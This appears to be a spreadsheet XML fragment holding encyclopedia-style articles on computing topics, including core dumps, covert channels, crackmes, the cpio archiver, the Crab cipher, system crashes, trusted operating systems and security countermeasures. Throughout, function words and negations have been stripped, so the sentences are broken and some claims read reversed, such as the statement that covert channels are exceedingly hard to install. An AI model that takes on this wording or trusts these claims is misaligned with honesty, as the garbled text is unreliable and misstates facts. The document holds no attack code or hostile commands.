marketplace learned ibm's disk problems, core unique position capitalize opportunity, without significant competition. months model short supply. delays attributed lack drives, technical problems machine undisclosed issues. core desired major partner selected control data corporation (cdc) assist introduction drives marketplace. announcement made february 1985 generated significant amount press coverage. core discovered general lack understanding existed among news media users regarding technology different computer mass storage systems. understood value different systems end-user rate many choices marketplace. response, core began placing considerable emphasis user education, resulted major contribution computer industry. directly efforts, news media, computer magazines, product reviewers, dealers computer manufactures started discussing, providing promoting "seek time", "access time", "transfer time" value understand hard disk drives importance computer system. company believed end-users learned computers engineering behind core products, less users wanted product. purchasers reporting dealers installing inferior drives computer without disclosing fact. help buyers industry education, core developed diskp program, later replaced coretest (dos based), identify sub-standard products providing visual demonstration speed comparative measurements hard disk drives controllers. many computer publications, hardware manufacturers, distributors, dealers independent evaluation firms relied coretest product comparison, made coretest industry standard often quoted benchmark. programs provide without charge freely available bbs, computer magazines dealers, believed installed base million copies worldwide promoting core technology education. years, newspapers, magazines computer publications stories computer memories inc. (cmi) hard disk drives problems. references external links sony official website</t>
  </si>
  <si>
    <t>Core dump</t>
  </si>
  <si>
    <t>computing, core dump, memory dump, crash dump, storage dump, system dump, abend dump consists recorded state working memory computer program specific time, generally program crashed otherwise terminated abnormally. practice, pieces program state usually dumped time, including processor registers, include program counter stack pointer, memory management information, processor operating system flags information. snapshot dump snap dump) memory dump requested computer operator running program, program able continue. core dumps often used assist diagnosing debugging errors computer programs. many operating systems, fatal exception program automatically triggers core dump. extension, phrase dump core" come mean many cases, fatal error, regardless whether record program memory exists. term "core dump", "memory dump", "dump" also become jargon indicate output large amount data examination purposes. background name comes magnetic-core memory, principal form random-access memory 1950s 1970s. name remained long magnetic-core technology became obsolete. earliest core dumps paper printouts contents memory, typically arranged columns octal hexadecimal numbers "hex dump"), sometimes accompanied interpretations machine language instructions, text strings, decimal floating-point numbers (cf. disassembler). memory sizes increased post-mortem analysis utilities developed, dumps written magnetic media like tape disk. instead displaying contents applicable memory, modern operating systems typically generate file containing image memory belonging crashed process, memory images parts address space related process, along information values processor registers, program counter, system flags, information useful determining root cause crash. these files viewed text, printed, analysed specialised tools elfdump unix unix-like systems, objdump kdump linux, ipcs (interactive problem control system) z/os, (dump viewing facility) z/vm, windbg microsoft windows, valgrind, debuggers. operating systems application operator request snapshot selected storage blocks, rather storage used application operating system. uses core dumps serve useful debugging aids several situations. early standalone batch-processing systems, core dumps allowed user debug program without monopolizing (very expensive) computing facility debugging; printout could also convenient debugging using front panel switches lights. shared computers, whether time-sharing, batch processing, server systems, core dumps allow off-line debugging operating system, system back operation immediately. core dumps allow user save crash later off-site analysis, comparison crashes. embedded computers, impractical support debugging computer itself, analysis dump take place different computer. some operating systems early versions unix support attaching debuggers running processes, core dumps necessary debugger process's memory contents. core dumps used capture data freed dynamic memory allocation thus used retrieve information program longer running. absence interactive debugger, core dump used assiduous programmer determine error direct examination. snap dumps sometimes convenient applications record quick dirty debugging output. analysis core dump generally represents complete contents dumped regions address space dumped process. depending operating system, dump contain data structures interpretation memory regions. systems, successful interpretation requires program user trying interpret dump understands structure program's memory use. debugger symbol table, exists, help programmer interpret dumps, identifying variables symbolically displaying source code; symbol table available, less interpretation dump possible, might still enough possible determine cause problem. there also special-purpose tools called dump analyzers analyze dumps. popular tool, available many operating systems, binutils' objdump. modern unix-like operating systems, administrators programmers read core dump files using binutils binary file descriptor library (bfd), debugger (gdb) objdump library. this library supply data given address memory region core dump; know anything variables data structures memory region, application using library read core dump determine addresses variables determine layout data structures itself, example using symbol table program undergoing debugging. analysts crash dumps linux systems kdump linux kernel crash dump (lkcd).core dumps save context (state) process given state returning later. systems made highly available transferring core processors, sometimes core dump files themselves. core also dumped onto remote host network (which security risk). core-dump files format older simpler operating systems, process contiguous address-space, dump file sometimes simply file sequence bytes, digits, characters words. early machines dump file contained discrete records, containing storage address associated contents. early machines, dump often written stand-alone dump program rather application operating system. system/360, standard operating systems wrote formatted abend snap dumps, addresses, registers, storage contents, etc., converted printable forms. later releases added ability write unformatted dumps, called time core image dumps. modern operating systems, process address space contain gaps, share pages processes files, elaborate representations used; also include information state program time dump. unix-like systems, core dumps generally standard executable image-format: a.out older versions unix, modern linux, system solaris, systems, mach-o macos, etc. naming os/360 successors os/360 successors, assign arbitrary data names (dsns) ddnames sysabend sysudump formatted abend dump arbitrary ddnames snap dumps, define ddnames sysout. damage assessment repair (dar) facility added automatic unformatted dump dataset sys1.dump time failure well console dump requested operator. newer transaction dump similar older forms dumps. unix-like since solaris system utility coreadm allows name location core files configured. dumps user processes traditionally created core. linux (since versions 2.4.21 linux kernel mainline), different name specified procfs using /proc/sys/kernel/core_pattern configuration file; specified name also template contains tags substituted example, executable filename, process reason dump. system-wide dumps modern unix-like systems often appear vmcore vmcore.incomplete. others systems microsoft windows, filename extensions, extension .dmp; example, core dumps named memory.dmp \minidump\mini051509-01.dmp. windows memory dumps microsoft windows supports memory dump formats, described below. kernel-mode dumps there five types kernel-mode dumps: complete memory dump contains full physical memory target system. kernel memory dump contains memory kernel time crash. small memory dump contains various info stop code, parameters, list loaded device drivers, etc. automatic memory dump (windows later) kernel memory dump, paging file system managed small capture kernel memory dump, automatically increase paging file least size four weeks, reduce smaller size. active memory dump (windows later) contains memory kernel user mode applications.to analyze windows kernel-mode dumps debugging tools windows used. user-mode memory dumps user-mode memory dump, also known minidump, memory dump single process. contains selected data records: full partial (filtered) process memory; list threads call stacks state (such registers teb); information handles kernel objects; list loaded unloaded libraries. full list options available minidump_type enum. space missions nasa voyager program probably first craft routinely utilize core dump feature deep space segment. core dump feature mandatory telemetry feature deep space segment proven minimize system diagnostic costs. voyager craft uses routine core dumps spot memory damage cosmic events. space mission core dump systems mostly based existing toolkits target subsystem. however, duration mission core dump subsystem substantially modified enhanced specific needs mission. also database dump dump file copying references notes external links descriptions file format core(5) linux programmer's manual file formats core(4) solaris file formats reference manual core(4) hp-ux file formats manual core(5) freebsd file formats manual core(5) openbsd file formats manual core(5) netbsd file formats manual core(5) darwin macos file formats manual minidump fileskernel core dumps: savecore(1m) solaris system administration commands reference manual apple technical note tn2118: kernel core dumps</t>
  </si>
  <si>
    <t>Corkscrew (program)</t>
  </si>
  <si>
    <t>corkscrew computer program enables user tunnel connections http https proxy servers. combined features port forwarding, allow many types services securely http connections. supported proxy servers: gauntlet cacheflow internet junkbuster squid apache's mod_proxy references external links homepage github</t>
  </si>
  <si>
    <t>Cotton Candy (single-board computer)</t>
  </si>
  <si>
    <t>cotton candy small, fanless single-board computer stick, putting full functions personal computer device size memory stick, manufactured norwegian-based hardware software for-profit startup company technologies (also referred "fxi tech"). overview cotton candy low-power architecture based computer uses dual-core processors dual-core exynos 4210 cortex-a9 cache) (system chip) samsung, featuring quad-core mali-400 opengl capable 2d/3d graphics processing unit, audio video decoder hardware engine, trustzone (security extensions) cryptographic engine security accelerator (cesa) co-processor. platform said able stream decode h.264 1080p content, able desktop class interfaces gnome linux.fxi technologies claims android (ice cream sandwich) latest ubuntu desktop linux operating systems, leveraging linaro builds linux kernel optimizations.as september 2012, started ship pre-ordered devices. time writing (november 2013), cotton candy generally available. also made beta android image beta linux image available download.on july 2014, declared bankruptcy. reception january 2012 cotton candy made top-10 finalist "last gadget standing" technology competition 2012. also 2012, laptopmag.com made cotton candy top-10 finalist "readers’ choice best 2012" award. efytimes news network well named technologies cotton candy "top gadgets launched 2012". also exynos, system chip samsung used cotton candy references external links official website</t>
  </si>
  <si>
    <t>TruCluster</t>
  </si>
  <si>
    <t>trucluster closed-source high-availability clustering solution tru64 unix operating system. originally developed digital equipment corporation (dec), transferred compaq 1998 digital acquired company, later merged hewlett-packard (hp). references trucluster software product description (spd) external links</t>
  </si>
  <si>
    <t>CounterSpy (software)</t>
  </si>
  <si>
    <t>counterspy proprietary spyware removal program microsoft windows software developed sunbelt software. features counterspy scans spyware, examining files hard drive, objects memory, windows registry cookies capability called resuscitate) that, according sunbelt, improves chances killing resuscitators. past, tool based used giant antispyware's engine. program currently version 3.1. sunbelt software released version includes revamped interface smaller memory footprint.it available download 15-day trial version, effective 2011, counterspy discontinued longer available purchase. references external links official site</t>
  </si>
  <si>
    <t>Cover-coding</t>
  </si>
  <si>
    <t>cover-coding technique obscuring data transmitted insecure link, reduce risks snooping. example cover-coding would sender perform bitwise (exclusive original data password random number known sender receiver. resulting cover-coded data transmitted sender receiver, uncovers original data performing bitwise (exclusive operation received data using password random number. 18000-6c (epc class generation rfid tags protect operations cover code. reader requests random number tag, responds random number. reader encrypts future communications number, using bitwise xor, data sends. cover coding secure signal can't intercepted random number re-used. compared loud transmissions reader, backscatter much weaker difficult impossible intercept. references</t>
  </si>
  <si>
    <t>Covert channel</t>
  </si>
  <si>
    <t>computer security, covert channel type attack creates capability transfer information objects processes supposed allowed communicate computer security policy. term, originated 1973 butler lampson, defined channels "not intended information transfer all, service program's effect system load," distinguish legitimate channels subjected access controls compusec. characteristics covert channel called hidden access control mechanisms secure operating systems since legitimate data transfer mechanisms computer system (typically, read write), therefore cannot detected controlled security mechanisms underlie secure operating systems. covert channels exceedingly hard install real systems, often detected monitoring system performance. addition, suffer signal-to-noise ratio data rates (typically, order bits second). they also removed manually high degree assurance secure systems well established covert channel analysis strategies. covert channels distinct from, often confused with, legitimate channel exploitations attack low-assurance pseudo-secure systems using schemes steganography even less sophisticated schemes disguise prohibited objects inside legitimate information objects. legitimate channel misuse steganography specifically form covert channel.covert channels tunnel secure operating systems require special measures control. covert channel analysis proven control covert channels. contrast, secure operating systems easily prevent misuse legitimate channels, distinguishing important. analysis legitimate channels hidden objects often misrepresented successful countermeasure legitimate channel misuse. because amounts analysis large amounts software, shown early 1972 impractical. without informed this, misled believe analysis "manage risk" legitimate channels. tcsec criteria trusted computer security evaluation criteria (tcsec) criteria, deprecated, established national computer security center, agency managed united states' national security agency. lampson's definition covert channel paraphrased tcsec specifically refer ways transferring information higher classification compartment lower classification. shared processing environment, difficult completely insulate process effects another process operating environment. covert channel created sender process modulates condition (such free space, availability service, wait time execute) detected receiving process. tcsec defines kinds covert channels: storage channels communicate modifying "storage location", hard drive. timing channels perform operations affect "real response time observed" receiver.the tcsec, also known orange book, requires analysis covert storage channels classified system analysis covert timing channels requirement class timing channels delays packets transmitted computer networks first explored girling covert communication. this work motivated many works establish detect covert communication analyze fundamental limitations scenarios. identifying covert channels ordinary things, existence file time used computation, medium covert channel communicates. covert channels easy find media numerous frequently used. relatively techniques remain standards locating potential covert channels. works analyzing resources system works source-code level. eliminating covert channels possibility covert channels cannot eliminated, although significantly reduced careful design analysis. detection covert channel made difficult using characteristics communications medium legitimate channel never controlled examined legitimate users. example, file opened closed program specific, timed pattern detected another program, pattern interpreted string bits, forming covert channel. since unlikely legitimate users check patterns file opening closing operations, type covert channel remain undetected long periods. similar case port knocking. usual communications timing requests irrelevant unwatched. port knocking makes significant. data hiding model handel sandford presented research study covert channels within general design network communication protocols. they employ model basis development characterize system elements potential used data hiding. adopted approach advantages standards opposed specific network environments architectures considered. their study present foolproof steganographic schemes. rather, establish basic principles data hiding seven layers. besides suggesting reserved fields protocols headers (that easily detectable) higher network layers, also propose possibility timing channels involving csma/cd manipulation physical layer. their work identifies covert channel merit detectability: covert channel must measurable intended recipient only. indistinguishability: covert channel must lack identification. bandwidth: number data hiding bits channel use.their covert channel analysis consider issues interoperability data hiding techniques network nodes, covert channel capacity estimation, effect data hiding network terms complexity compatibility. moreover, generality techniques cannot fully justified practice since model exist functional systems. data hiding environment covert channels girling first analyzes covert channels network environment. work focuses local area networks (lans) three obvious covert channels (two storage channel timing channel) identified. this demonstrates real examples bandwidth possibilities simple covert channels lans. specific environment, author introduced notion wiretapper monitors activities specific transmitter lan. covertly communicating parties transmitter wiretapper. covert information according girling communicated following obvious ways: observing addresses approached transmitter. total number addresses sender approach possibility secret communication bits secret message. author termed possibility covert storage channel depends sent (i.e., address approached sender). way, obvious storage covert channel would depend size frame sent sender. possible sizes, amount covert information deciphered size frame would bits. again scenario termed covert storage channel. third scenario presented uses presence absence messages. instance, message time interval, even.the scenario transmits covert information "when-is-sent" strategy therefore termed timing covert channel. time transmit block data calculated function software processing time, network speed, network block sizes protocol overhead. assuming block various sizes transmitted lan, software overhead computed average novel time evaluation used estimate bandwidth (capacity) covert channels also presented. work paves future research. data hiding tcp/ip protocol suite covert channels focusing headers tcp/ip protocol suite, article published craig rowland devises proper encoding decoding techniques utilizing identification field, initial sequence number acknowledge sequence number fields. these techniques implemented simple utility written linux systems running version kernels. rowland provides proof concept well practical encoding decoding techniques exploitation covert channels using tcp/ip protocol suite. these techniques analyzed considering security mechanisms like firewall network address translation. however, non-detectability covert communication techniques questionable. instance, case sequence number field header manipulated, encoding scheme adopted every time alphabet covertly communicated, encoded sequence number. moreover, usages sequence number field well acknowledgment field cannot made specific ascii coding english language alphabet proposed, since fields take account receipt data bytes pertaining specific network packet(s). after rowland, several authors academia published work covert channels tcp/ip protocol suite, including plethora countermeasures ranging statistical approaches machine learning. research network covert channels overlaps domain network steganography, emerged later. also computer network surveillance monitoring computer network activity side-channel attack attack based information gained implementation computer system steganography hiding messages messages subliminal channel covert cryptographic channel references further reading timing channels early exploitation timing channel multics. covert channel tool hides data ipv6, securityfocus, august 2006. raggo, michael; hosmer, chet (2012). data hiding: exposing concealed data multimedia, operating systems, mobile devices network protocols. syngress publishing. isbn 978-1597497435. lakshmanan, ravie (2020-05-04). "new malware jumps air-gapped devices turning power-supplies speakers". open online class covert channels (github) external links gray-world open source research team tools papers steath network operations centre covert communication support system</t>
  </si>
  <si>
    <t>Cowon</t>
  </si>
  <si>
    <t>cowon systems, inc. (simply known cowon) south korean consumer electronics software corporation. company’s initial focus software development microelectronics, specializing speech synthesis speech recognition technology. 2000, introduction iaudio cw100, cowon expanded portable media player industry, core business.in 2010, cowon ranked number category japanese management association consultants’ global customer satisfaction competency index, 2011, ranked number organization’s global great brand competency index.in west, cowon well known iaudio range portable media players, resulted many people incorrectly referring company “cowon iaudio” simply “iaudio.” outside domestic market, cowon iaudio's sales market share always minuscule however, gained certain niche market retains loyal following fans enthusiasts. products marketing, cowon distinguishes "mp3 players" "portable media players," latter larger greater focus video playback. categories differ slightly korean global homepage. cowon products produced domestically south korea. players cowon (2014) cowon (2014) iaudio (2013) cowon (2013) cowon (2012) iaudio (2011) cowon (2011) cowon (2010) cowon (2010) iaudio (2009) iaudio (2009) cowon (2008) liaail products cowon’s liaail division, founded 2011, focuses personal audio cell phone accessories. among products found: earphones cowon cowon cowon cowon cowon cowon cowon cell phone cases bird case tree case leather case jelly case cell phone screen protectors other products cowon ad1, camera released 2012 cowon ac1, camera released 2012 cowon windows 7-based ultra-mobile released 2010, available models cowon ssd, windows 7-based ultra-mobile equipped solid state drive, released 2010, available model cowon navigation device in-car entertainment system released 2009 cowon navigation device in-car entertainment system released 2007 discontinued products cowon cowon iaudio cowon cowon plenue cowon cowon iaudio iaudio cowon cowon cowon cowon iaudio portable media players cowon cowon cowon plenue cowon plenue cowon cowon cowon cowon cowon cowon cowon iaudio cowon cowon jeteffect each cowon player equipped software sound enhancement technologies collectively referred jeteffect. latest version jeteffect, jeteffect introduced release cowon plenue. jeteffect competes products sony's dsee, samsung's dnse, technologies found products iriver samsung products branded "beats audio". features latest iteration, jeteffect contains following sound effects enhancements: five-band equalizer bbe+ bbe+ mach3bass surround enhance special effects reverb stereo enhance jetaudio history jeteffect jeteffect jeteffect software computer software jetaudio, media player application microsoft windows first released 1997 jetvideo, video player application microsoft windows features partially overlap jetaudio. like jetaudio, relies external codecs (such included k-lite codec pack) data decoding. android apps jetaudio android jetvdjetvd android application downloading videos youtube wide selection formats. first introduced users cowon plenue upgrade firmware version x.55. online version jetvd, called jettoy, exists beta stage. other software other software developed cowon includes iaudio manager, small application tagging music files timecoded lyrics displayable cowon media players well jetaudio. cowon also offers number freeware utilities, including jetcast, jetmailmonitor jettoolbar. available free download jetaudio website.cowon’s ultra-mobile come jettoolbar pre-installed. also iaudio jeteffect jetaudio list cowon products cowon plenue cowon cowon cowon references external links cowonglobal.com jetaudio (american homepage) liaail idea archived 2014-06-05 wayback machine jettoy</t>
  </si>
  <si>
    <t>Cpio</t>
  </si>
  <si>
    <t>cpio general file archiver utility associated file format. primarily installed unix-like computer operating systems. software utility originally intended tape archiving program part programmer's workbench (pwb/unix), component virtually every unix operating system released thereafter. name derived phrase copy out, close description program's standard input standard output operation. variants unix also support backup archiving programs, tar, become widely recognized. cpio package manager, initramfs program linux kernel 2.6, apple's installer (pax) make cpio important archiving tool. since original design, cpio archive file format undergone several, sometimes incompatible, revisions. most notable change, operational option, binary format archive file meta information ascii-based representation. posix abandoned cpio command favor command. history cpio appeared version unix part programmer's workbench project. operation archive format cpio originally designed store backup file archives tape device sequential, contiguous manner. compress content, resulting archives often compressed using gzip external compressors. archive creation when creating archives copy-out operation, initiated command line flag, cpio reads file directory path names standard input channel writes resulting archive byte stream standard output. cpio therefore typically used utilities generate list files archived, find program. resulting cpio archive sequence files directories concatenated single archive, separated header sections file meta information, filename, inode number, ownership, permissions, timestamps. convention, file name archive usually given file extension cpio. this example uses find utility generate list path names starting current directory create archive directory tree: extraction during copy-in operation, initiated command line flag cpio reads archive standard input recreates archived files operating system's file system. command line flag tells cpio construct directories necessary. flag (verbose) lists file names extracted. remaining command line arguments option flags shell-like globbing-patterns; files archive matching names copied archive. following example extracts file /etc/fstab archive: list files contained cpio archive listed invocation: list useful since cpio archive contain absolute rather relative paths (e.g., /bin/ls bin/ls). copy cpio supports third type operation copies files. initiated pass-through option flag (p). this mode combines copy-out copy-in steps without actually creating file archive. mode, cpio reads path names standard input like copy-out operation, instead creating archive, recreates directories files different location file system, specified path given command line argument. this example copies directory tree starting current directory another path new-path file system, preserving files modification times (flag creating directories needed (d), replacing existing files unconditionally (u), producing progress listing standard output (v): posix standardization cpio utility standardized posix.1-1988, omitted posix.1-2001 file size limitations. example, version offers various output format options, "bin" (default, obsolete) "ustar" (posix tar), file size limitations 2,147,483,647 bytes 8,589,934,591 bytes gb), respectively.the cpio, ustar, file formats defined posix.1-2001 utility, currently posix 1003.1-2008 compliant, read write cpio ustar formatted archives. implementations most linux distributions provide version cpio. freebsd macos bsd-licensed bsdcpio provided libarchive. also list unix commands list archive formats references external links cpio single unix specification, version 1997, opengroup.org indicates applications migrate utility utilities open group base specifications issue 2004 edition, opengroup.org indicates cpio removed cpio(1) edition bell labs' unix cpio(1) manual cpio(1) solaris user commands reference manual cpio(1) freebsd general commands manual cpio(1) openbsd general commands manual cpio(1) debian general commands manual</t>
  </si>
  <si>
    <t>Crab (cipher)</t>
  </si>
  <si>
    <t>cryptography, crab block cipher proposed burt kaliski matt robshaw first fast software encryption workshop 1993. really intended use, crab developed demonstrate ideas hash functions could used create fast cipher. crab unusually large block size 8192 bits. creators suggested using 80-bit key, cipher could size. authors specify actual schedule, used generate large sets subkeys: permutation numbers 255, array 2048 32-bit numbers. block divided 32-bit subblocks, permuted beginning. then algorithm makes four passes data, time applying four transformations adapted md5. brief note cryptanalysis crab included markku-juhani saarinen's paper block ciphers based sha-1 md5, published 2003. author demonstrates weakness crab permits distinguisher using dozen chosen plaintexts, speculates converted full key-recovery attack using chosen plaintexts. such attack would depend schedule used. references b.s. kaliski m.j.b. robshaw (december 1993). fast block cipher proposal. fast software encryption (fse '93). cambridge: springer-verlag. 33–40. u.s. patent 6,463,150 patent encryption device uses crab. schneier, bruce (1996). applied cryptography (2nd ed.). john wiley sons. 342–344. isbn 0-471-11709-9. markku-juhani olavi saarinen (february 2003). cryptanalysis block ciphers based sha-1 (pdf). '03. lund: springer-verlag. 36–44. retrieved october 2007.</t>
  </si>
  <si>
    <t>Trustix</t>
  </si>
  <si>
    <t>trustix secure linux linux distribution intended servers focused security stability. hardened secure meaning non-essential services binaries installed, unix staples like sendmail replaced programs like postfix. trustix originally produced trustix company established late 1997 entrepreneurs norway. company went bankrupt 2003 comodo group bought assets november 2003. shortly thereafter comodo announced free version trustix secure linux. long thereafter comodo changed minds free version reappeared. late 2005 series budget cuts resulted many developers laid off, early 2006 members original trustix team left company. trustix secure linux continues maintained small team developers india.by late 2007 comodo announced discontinue distribution, updates direct support trustix secure linux effective december 2007. external links trustix secure linux wayback machine (archived october 2007) trustix secure linux distrowatch.com</t>
  </si>
  <si>
    <t>Crackme</t>
  </si>
  <si>
    <t>crackme (often abbreviated small program designed test programmer's reverse engineering skills.they programmed reversers legal crack software, since intellectual property infringed upon. crackmes, reversemes keygenmes generally similar protection schemes algorithms found proprietary software. however, wide packers/protectors commercial software, many crackmes actually difficult algorithm harder find track commercial software. keygenme keygenme specifically designed reverser find protection algorithm used application, also write small keygen programming language choice. most keygenmes, properly manipulated, self-keygenning. example, checking, might generate corresponding simply compare expected entered keys. this makes easy copy generation algorithm. often anti-debugging anti-disassemble routines used confuse debuggers make disassembly useless. code-obfuscation also used make reversing even harder. references external links tdhack.com includes cryptographic riddles, hackmes software applications crack windows linux. polish english languages supported. ollydbg program used beginners experienced people.</t>
  </si>
  <si>
    <t>Crankcase dilution</t>
  </si>
  <si>
    <t>crankcase dilution phenomenon internal combustion engines unburned diesel gasoline accumulates crankcase. excessively rich fuel mixture incomplete combustion allows certain amount fuel pass pistons cylinder walls dilute engine oil. common situations fuel injected high pressure, direct-injected diesel engine. when mixture fuel enters cylinder engine, entirely possible condensation fuel occur cooler parts cylinders. condensate wash lubricating cylinder walls, travel past piston rings collect pan, thus increasing wear also diluting lubricating oil. since less volatile components fuel greatest tendency condense, degree crankcase-oil dilution directly related volatility temperatures mixture. causes crankcase dilution occurs fuel engine gets lube engine. this caused walls wetted fuel condensing cylinder. engine cold, excess amount cooling around cylinder, fuel condense higher chance crankcase. another fuel crankcase much wear piston compression rings. piston compression ring keep exhaust gases entering crankcase, much wear longer job. other piston rings, “blow-by” gases push fuel past rings crankcase. “blow-by” gases fuel exhaust gases push past piston rings. crankcase dilution caused lube fresher. another cause crankcase dilution slow delayed injection cycle. this causes timing thrown likely enter crankcase point. water dirt also effects crankcase dilution. also, soot getting lube cause crankcase dilution, additives keep soot lube oil. soot collects crankcase fully goes away lube changed engine. additives added cause soot stay engine lube oil. these substances getting lube accelerate effects crankcase dilution. effects fuel crankcase lube cause chemically degrade. this means loses viscosity less effective lubricating. loss viscosity lube causes fully connect lubricate moving parts engine. this lack lubrication cause engine increased amount wear time. reducing crankcase dilution there many ways reduce amount crankcase dilution occurs engine. ways counteract loss viscosity using heavier oil. viscosity recommended 500-575 sec. another thing reduce effects crankcase dilution changing piston compression rings become worn. this would reduce amount blow-by gases overall reducing effects. another thing done change car's regularly avoid wear engine crankcase dilution. detecting crankcase dilution detecting crankcase dilution help reduce effects engine. there many ways detect crankcase dilution. ways check flash point compare brand lube oil. test flash point manually take sample testing kit. when fuel leaks lube chemical makeup different normal lube oil. another test crankcase dilution test concentration fuel crankcase oil. stands surface acoustic wave. biodiesel crankcase dilution biodiesel vegetable animal fats mixed lipids produce alcohol burned. alcohol produced biodiesel. engines biodiesel problem regular fuel engines. biodiesel fuel finds crankcase engine mixes lube oil. when biodiesel leaks crankcase, problems traditional fuel. biodiesel higher boiling point regular fuel less likely evaporate causing stay crankcase longer period time. also, longer biodiesel stays inside crankcase, degrades organic acids lube reacts crankcase wall. after reacting, causes deposits reacted biodiesel walls crankcase there ways effects reduced. chevron created additives reduce effects biodiesel. also analysis stacking references</t>
  </si>
  <si>
    <t>Crash (computing)</t>
  </si>
  <si>
    <t>computing, crash, system crash, occurs computer program software application operating system stops functioning properly exits. operating systems individual applications, crash reporting service report crash details relating give user option so), usually developer(s) application. program critical part operating system, entire system crash hang, often resulting kernel panic fatal system error. most crashes result software bug. typical causes include accessing invalid memory addresses, incorrect address values program counter, buffer overflow, overwriting portion affected program code earlier bug, executing invalid machine instructions illegal opcode), triggering unhandled exception. original software started chain events typically considered cause crash, discovered process debugging. original removed code actually triggered crash. early personal computers, attempting write data hardware addresses outside system's main memory could cause hardware damage. some crashes exploitable malicious program hacker execute arbitrary code allowing replication viruses acquisition data would normally inaccessible. application crashes application typically crashes performs operation allowed operating system. operating system triggers exception signal application. unix applications traditionally responded signal dumping core. most windows unix applications respond displaying dialogue (such shown right) option attach debugger installed. some applications attempt recover error continue running instead exiting. application also contain code crash detecting severe error. typical errors result application crashes include: attempting read write memory allocated reading writing application (e.g., segmentation fault, x86-specific general protection fault) attempting execute privileged invalid instructions attempting perform operations hardware devices permission access passing invalid arguments system calls attempting access system resources application permission access attempting execute machine instructions arguments (depending architecture): divide zero, operations denormal number (not number) values, memory access unaligned addresses, etc. crash desktop "crash desktop" said occur program (commonly video game) unexpectedly quits, abruptly taking user back desktop. usually, term applied crashes error displayed, hence user sees result crash desktop. many times apparent action causes crash desktop. during normal function, program freeze shorter period time, close itself. also normal function, program become black screen repeatedly play last seconds sound (depending size data buffer) played crashes desktop. other times appear triggered certain action, loading area. crash desktop bugs considered particularly problematic users. since frequently display error message, difficult track source problem, especially times occur actions taking place right crash appear pattern common ground. track source problem games windowed-mode. windows vista feature help track cause problem occurs program. windows included similar feature well.some computer programs, stepmania bbc's bamzooki, also crash desktop full-screen, display error separate window user returned desktop. server crashes software running server behind website crash, rendering inaccessible entirely providing error message instead normal content. example: site using database (such mysql) script (such php) database server crashes, display connection error. operating system crashes operating system crash commonly occurs hardware exception occurs cannot handled. operating system crashes also occur internal sanity-checking logic within operating system detects operating system lost internal self-consistency. modern multi-tasking operating systems, linux, macos, usually remain unharmed application program crashes. some operating systems, e.g., z/os, facilities reliability, availability serviceability (ras) recover crash critical component, whether hardware failure, e.g., uncorrectable error, software failure, e.g., reference unassigned page. security privacy implications crashes depending application, crash contain user's sensitive private information. moreover, many software bugs cause crashes also exploitable arbitrary code execution types privilege escalation. example, stack buffer overflow overwrite return address subroutine invalid value, cause, e.g., segmentation fault, subroutine returns. however, exploit overwrites return address valid value, code address executed. crash reproduction when crashes collected field using crash reporter, next step developers able reproduce locally. this, several techniques exist: star uses symbolic execution, mucrash mutates test code application crashed, evocrash performs evolutionary search. also blue screen death crash-only software data loss guru meditation memory corruption reboot safe mode systemrescuecd undefined behavior notes references external links picking pieces after computer crash</t>
  </si>
  <si>
    <t>Trusted operating system</t>
  </si>
  <si>
    <t>trusted operating system (tos) generally refers operating system provides sufficient support multilevel security evidence correctness meet particular government requirements. common criteria trusted operating system design common criteria combined security functional requirements (sfrs) labeled security protection profile (lspp) mandatory access control (mac). common criteria result multi-year effort governments u.s., canada, united kingdom, france, germany, netherlands countries develop harmonized security criteria products. examples examples certified trusted operating systems are: apple 10.6 (rated hp-ux (rated some linux distributions (rated microsoft windows microsoft server 2008 (rated pitbull foundation (rated trusted solaris trusted unicos (rated xts-400 (rated eal5+) (sp, bse, hpo, esa, etc.) racfexamples operating systems might certifiable are: freebsd trustedbsd extensions selinux (see faq)companies created trusted operating systems include: addamax (bsd, svr3, svr4, hp/ux) argus systems group (solaris, aix, linux) at&amp;t (system systems (xts unix) bull (aix) data general (dg/ux) digital equipment corporation (ultrix) forcepoint (hardened selinux) gemini computers (gemsos) general dynamics systems (linux) harris corporation (svr3, svr4) hewlett-packard (hp/ux) honeywell (multics) (os/390, aix) (sco unix) secure computing corporation (lock, mach, bsd) secureware (apple a/ux, hp/ux, sco) sequent computer systems (dynix/ptx) silicon graphics (irix) microsystems (sunos, solaris) trusted information systems (xenix, mach) also common criteria comparison operating systems security-evaluated operating system security-focused operating system references external links common criteria portal certified products selinux argus systems web3 operating system</t>
  </si>
  <si>
    <t>Countermeasure (computer)</t>
  </si>
  <si>
    <t>computer security countermeasure action, device, procedure, technique reduces threat, vulnerability, attack eliminating preventing minimizing harm cause, discovering reporting corrective action taken. definition ietf 2828 cnss instruction 4009 dated april 2010 committee national security systems united states america.according glossary infosectoday, meaning countermeasure deployment security services protect security threat.a synonym security control. telecommunications, communication countermeasures defined security services part reference model itu-t x.800 recommendation. x.800 7498-2 (information processing systems open systems interconnection basic reference model part security architecture technically aligned. following picture explain relationships concepts terms: attack: |counter- system resource: i.e., threat action measure target attack +----------+ +-----------------+ attacker |&lt;==================||&lt;========= i.e., passive vulnerability threat |&lt;=================&gt;||&lt;========&gt; agent active +-------|||-------+ +----------+ attack threat consequences resource (both physical logical) vulnerabilities exploited threat agent threat action. result potentially compromises confidentiality, integrity availability properties resources (potentially different vulnerable one) organization others involved parties (customers, suppliers). so-called triad basis information security. attack active attempts alter system resources affect operation: compromises integrity availability. "passive attack" attempts learn make information system affect system resources, compromising confidentiality. threat potential violation security, exists circumstance, capability, action, event could breach security cause harm. that threat possible danger enabling exploitation vulnerability. threat either "intentional" (i.e., intelligent; e.g., individual cracker criminal organization) "accidental" (e.g., possibility computer malfunctioning, possibility "act god" earthquake, fire, tornado).a policies concerned information security management, information security management systems (isms), developed manage, according risk management principles, countermeasures order accomplish security strategy following rules regulations applicable country. countermeasures against physical attacks potential malicious actor physical access computer system, greater chance inflicting harm upon electronic destruction devices devices killer used damage render completely unusable anything connection motherboard computer, port, video port, ethernet port, serial port. without proper protection, devices result destruction ports, adapter cards, storage devices, ram, motherboards, cpus, anything physically connected device attacked, monitors, flash drives, wired switches. these types devices even used damage smartphones cars, well.this threat mitigated installing restricting physical access easily accessible ports situations necessary. port-closing lock permanently disables access port short actual port disassembled. when necessary port accessible, optocoupler allow port send receive data computer device without direct electrical connection, preventing computer device receiving dangerous voltage external device. hard drives storage unsecured scenario, malicious actor steal destroy storage devices hard drives ssds, resulting destruction theft valuable data. data storage device longer necessary, data theft best prevented physically destroying shredding storage device.if data storage device must secured, encryption encrypt contents storage device, even encrypt whole storage device save master boot record. device unlocked password, biometric authentication, physical dongle, network interchange, one-time password, combination thereof. device boot drive, however, must unencrypted pre-boot environment operating system accessed. striping, breaking 